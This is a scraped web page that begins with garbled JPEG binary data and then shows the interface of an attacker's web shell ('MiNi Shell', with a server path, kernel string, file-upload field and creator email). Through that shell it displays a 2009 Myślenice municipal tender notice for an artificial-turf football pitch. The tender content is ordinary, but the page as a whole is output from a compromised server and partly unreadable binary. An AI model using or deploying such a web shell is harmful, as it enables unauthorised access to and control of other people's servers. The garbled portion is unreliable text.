JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090521/160856-N-2009.html

<p class="kh_header"><b>Myślenice: REWITALIZACJA MIASTA - ROZBUDOWA CENTRUM SPORTU I REKREACJI
W MYŚLENICACH - ZARABIE
BUDOWA BOISKA SPORTOWEGO ZE SZTUCZNĄ NAWIERZCHNIĄ</b><br>
<b>Numer ogłoszenia: 160856 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Myślenice , Rynek 8/9, 32-400 Myślenice, woj. małopolskie, tel. 012 6392300, faks 012 6392305.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REWITALIZACJA MIASTA - ROZBUDOWA CENTRUM SPORTU I REKREACJI
W MYŚLENICACH - ZARABIE
BUDOWA BOISKA SPORTOWEGO ZE SZTUCZNĄ NAWIERZCHNIĄ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
2.1. 	Przedmiotem zamówienia jest wykonanie robót budowlanych wraz z niezbędnymi pracami montażowymi, związanych z budową boiska piłkarskiego o wymiarach pola gry 105x 68 m z ułożeniem nawierzchni syntetycznej z trawy sztucznej oraz prace i roboty dodatkowe wyszczególnione w dokumentacji projektowej  (Załącznik nr 2 do SIWZ) oraz Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych (Załącznik nr 2 do SIWZ) i Szczegółowych Specyfikacjach Technicznych Wykonania i Odbioru robót Budowlanych (Załącznik nr 3 do niniejszej SIWZ).
2.3. 	Przedmiot zamówienia obejmuje wykonanie robót budowlanych i prac montażowych wraz z niezbędnymi dostawami, polegających na :

2.3.1. 	Budowie boiska do piłki nożnej na podbudowie przepuszczalnej z kruszywa kamiennego o nawierzchni ze sztucznej trawy, o całkowitej powierzchni z trawy sztucznej 8.362 m2 (pole gry 7.140 m2).
Zamawiający wymaga aby powierzchnia boiska wykonana z trawy sztucznej spełniała co najmniej następujące parametry techniczne trawy sztucznej; 
-	włókno proste, monofilowe o przekroju w kształcie litery C,
-	włókna wzmocnione na całej długości wtopionym rdzeniem stabilizującym,     	-       grubość włókna mierzona w jego środkowej części - min. 200 mikronów,
-       skład chemiczny włókna - polietylen, 
-	wytrzymałość na wyrywanie pęczków włókien trawy : min 40 N,
-	wysokość włókna - min. 60 mm,
-	gęstość pęczków -  8.400 - 9.000/m2 ,
-	gęstość włókien -  100.800 - 107.000 /m2,
-	ciężar dtex - min. 11.000,
-	ciężar całkowity nawierzchni - min. 2.300 g /m2,
	Trawa, która zostanie zastosowana do wykonania nawierzchni musi posiadać następujące atesty i certyfikaty:

-	certyfikat FIFA 2 Star dla obiektu wykonanego z oferowanego systemu nawierzchni,
-	potwierdzoną przez producenta kartę techniczną oferowanej nawierzchni,
-	atest PZH dla oferowanej nawierzchni,
-	autoryzację producenta trawy syntetycznej wystawionej dla wykonawcy na realizowaną inwestycję,
-	wyniki badań laboratorium badającego nawierzchnie sportowe potwierdzające, że oferowana nawierzchnia spełnia postawione wymagania techniczne.
2.3.2.  Wykonanie instalacji drenażu wgłębnego  pod powierzchnią boiska z rur drenarskich perforowanych wraz ze studzienkami rewizyjnymi
2.3.3.	Wykonanie studni chłonnych z kręgów betonowych Dn 1200 mm,
2.3.4. 	Wykonanie ogrodzenia boiska z siatki powlekanej o oczku 35x35 mm i wysokości 3,0 m, na słupkach stalowych ocynkowanych i malowanych proszkowo, wraz z trzema bramami dwuskrzydłowymi o rozmiarach 2,70 m x 2,20 m.  .
2.3.5. 	Dostawa i instalacja urządzeń składających się na wyposażenie boiska: 
	- piłkochwyty o wys. min. 5,5 m i długości 2 x 36 m
	- profesjonalne bramki do piłki nożnej o wym. 7,32 x 2,44 m zgodne z normami FIFA
2.3.6. 	Wykonanie nawierzchni z betonowej kostki brukowej grubości 8 cm (łącznie 762,62 m2) i z kostki brukowej grubości 6 cm (łącznie 94,9  m2)
2.3.7. Wykonanie trawników wokół boiska o łącznej powierzchni 1 164,00m2.
2.4. 	Szczegółowy opis przedmiotu zamówienia została zawarty w następujących  załącznikach do SIWZ:
	Załącznik Nr 1	Dokumentacja Projektowa.
Załącznik nr 2 	Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych
Uwaga:	W trakcie realizacji zamówienia Wykonawca zobowiązany będzie do złożenia w imieniu i na koszt Zamawiającego wniosku do FIFA o uzyskanie dla wykonanego obiektu Certyfikatu FIFA 2 STAR. Wniosek stanowić będzie załącznik do Protokołu odbioru ostatecznego robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium

11.1. 	Przystępując  do  niniejszego  postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 70.000 zł (słownie; siedemdziesiąt tysięcy złotych). 

11.2 	Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy pzp, tj.:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U 2007 r. Nr 42 poz. 275).
11.2.1	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy:
a)nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta-poręczyciela (instytucji udzielających gwarancji-poręczenia) oraz wskazanie ich siedzib,
b)określenie wierzytelności, która ma być zabezpieczona gwarancją-poręczeniem,
c)kwotę gwarancji-poręczenia,
d)termin ważności gwarancj-poręczenia,
e)zobowiązanie gwaranta-poręczyciela do:zapłacenia kwoty gwarancji-poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego Ofertę wybrano:
-odmówił podpisania umowy na warunkach określonych we ofercie, lub
-nie wniósł zabezpieczenia należytego wykonania umowy, lub
-zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
f)gwarancja-poręczenie winno być nieodwołalne i bezwarunkowe;
g)gwarancja-poręczenie musi być wykonalne na terytorium Rzeczpospolitej Polskiej.
h)	wszelkie spory dotyczące gwarancji-poręczenia podlegają rozstrzygnięciu zgodnie z prawem Rzeczpospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego.
i)	jednocześnie Zamawiający wymaga, aby okres ważności gwarancji-poręczenia nie był krótszy niż okres związania Ofertą.

11.3	Miejsce i sposób wniesienia wadium.

1)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego:

Bank Spółdzielczy w Wieliczce O-MyśleniceNr konta: 89 8619 0006 0020 0000 0071 0003
	
		Przelew powinien wskazywać numer i nazwę postępowania oraz oznaczenie części zamówienia na które Wykonawca składa Ofertę.

		Do Oferty należy dołączyć kopię polecenia przelewu lub kopię gwarancji/poręczenia  wniesionych-złożonych jako wadium, potwierdzoną za zgodność z oryginałem przez Wykonawcę.

W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.

2)	Wadium wnoszone w innych niż pieniądz formach należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, tj. w kasie Zamawiającego lub zamieścić w osobnej kopercie -opisanej wadium dołączonej do oferty. 

11.4	 Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy pzp, a jego oferta zostanie odrzucona na podstawie art. 89 ust. 1 pkt 5 ustawy pzp.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu i sposoby oceny ich spełnienia. 

9.1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu określone w art. 22 ust. 1 pkt 1-3 ustawy Prawo zamówień publicznych, tzn.:

9.1.1	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

9.1.2	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

W tym celu Wykonawca winien wykazać, iż
a)	dysponuje osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są wskazać te osoby, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia.

1))	Kierownik Budowy
§	Kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa; 
2))	Kierownik Robót Sieciowych
§	Kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa; 

Wykonawca zobowiązany jest dołączyć do oferty ksero, potwierdzone za zgodność z  oryginałem,    uprawnień  osób, o których mowa w pkt a) oraz  zaświadczenie,  wydane  przez  właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby.

	b)	wykonać w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej: trzy inwestycje budowlane polegające na budowie i wyposażeniu  boisk piłkarskich, o powierzchni min. 7.500 m2  (każde boisko) z trawy syntetycznej trzeciej generacji, tj. zasypywanej piaskiem kwarcowym i granulatem gumowym wraz z podbudową i drenażem, o wartości inwestycji min. 3 mln PLN brutto każda z inwestycji. 

9.1.3	Znajdują się w sytuacji ekonomiczne i finansowej zapewniającej wykonanie zamówienia tj.
a)	 posiadają środki finansowe lub posiadają zdolność kredytową w wysokości co najmniej 3 mln PLN 
b)	osiągnęli przychody netto ze sprzedaży za ostatnie dwa lata obrotowe ( rok 2007 i rok 2008) a jeżeli okres działalności jest krótszy w tym okresie, w wysokości co najmniej 30 mln PLN (za każdy wymagany rok obrotowy).

9.1.4.  Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.

Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego w oparciu o złożone oświadczenia i dokumenty, wskazane w pkt 10 niniejszej SIWZ, według formuły spełnia  nie spełnia. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy.

9.2 	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia Oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 

Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Rozdział 10
Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków w niniejszym postępowaniu

10.1. 	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy pzp  -  Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 6 oraz Załącznik Nr 7 do niniejszej SIWZ.

10.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

10.3	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

10.4	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, że wykonawca nie zalega z opłaceniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu ofert, 

10.5  	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  sporządzony zgodnie ze wzorem  stanowiącym Załącznik Nr 4 do niniejszej SIWZ.  Dla każdej pozycji wykazu należy załączyć dokumenty (protokoły odbioru, referencje, itp.) potwierdzające, że roboty te zostały wykonane należycie.

10.6	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu niniejszego zamówienia w charakterze specjalistów wymienionych w pkt. 9.1.2)a)1))÷2)), sporządzony według wzoru stanowiącego załącznik nr 5 do niniejszej IDW oraz załączyć dokumenty potwierdzające posiadanie uprawnień i aktualnych wpisów do właściwych izb samorządowych oraz pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, sporządzone według wzoru stanowiącego załącznik nr 5a do niniejszej SIWZ, jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował. 

10.7	Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym posiadają rachunek, potwierdzające posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości.

10.8	Rachunek zysków i strat, a jeżeli podlega on badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o rachunku zysków i strat, a w przypadku Wykonawców nie zobowiązanych do sporządzania rachunku zysków i strat innych dokumentów określających przychody netto ze sprzedaży za lata 2008 i 2007 a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. 

10.9.	Wykaz oświadczeń lub dokumentów sporządzony według wzoru stanowiącego załącznik nr 5b do niniejszej SIWZ. potwierdzających spełnianie warunków jakościowych w zakresie rodzaju trawy syntetycznej, jaką Wykonawca zamierza ułożyć na boisku:

10.9.1	Certyfikat FIFA 2 Star dla obiektu wykonanego z oferowanego systemu nawierzchni.
10.9.2	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
10.9.3	Atest PZH dla oferowanej nawierzchni.
10.9.4	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowana inwestycję.
10.9.5	Wyniki badań laboratorium badającego nawierzchnie sportowe potwierdzające, że oferowana nawierzchnia spełnia w.w wymagania techniczne postawione.

10.9.6	Do oferty Wykonawca jest zobowiązany dołączyć próbki oferowanej trawy syntetycznej.

10.10	Inne wymagane, niezbędne dokumenty w toku oceny i badania ofert 

10.10.1	zaparafowany projekt umowy,
10.10.2	dowód wniesienia wadium,
10.10.3	wypełniony (uzupełniony o ceny i narzuty)  kosztorys inwestorski  (załącznik nr 4a do SIWZ),
10.10.4	pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona  do reprezentowania Wykonawcy z mocy prawa,

10.11	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej:
w pkt 10.2, i 10.1.3), składa dokument lub dokumenty, wystawione w Kraju, w którym   
ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
                      a)nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b)nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;

Dokumenty, o których mowa w pkt a) powyżej powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania Ofert. Dokument, o którym mowa w pkt b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania Ofert.
	
	Jeżeli w Kraju pochodzenia osoby lub w Kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio Kraju pochodzenia osoby lub Kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 

Zamawiający wymaga by wszelkie kserokopie dokumentów składanych w ofercie były poświadczone za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.myslenice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Myślenicach
32-400 Myślenice
ul. Rynek 8/9
fax (0-12)639-23-05.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy w Myślenicach
32-400 Myślenice
ul. Rynek 8/9
sekretariat (pok.10).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com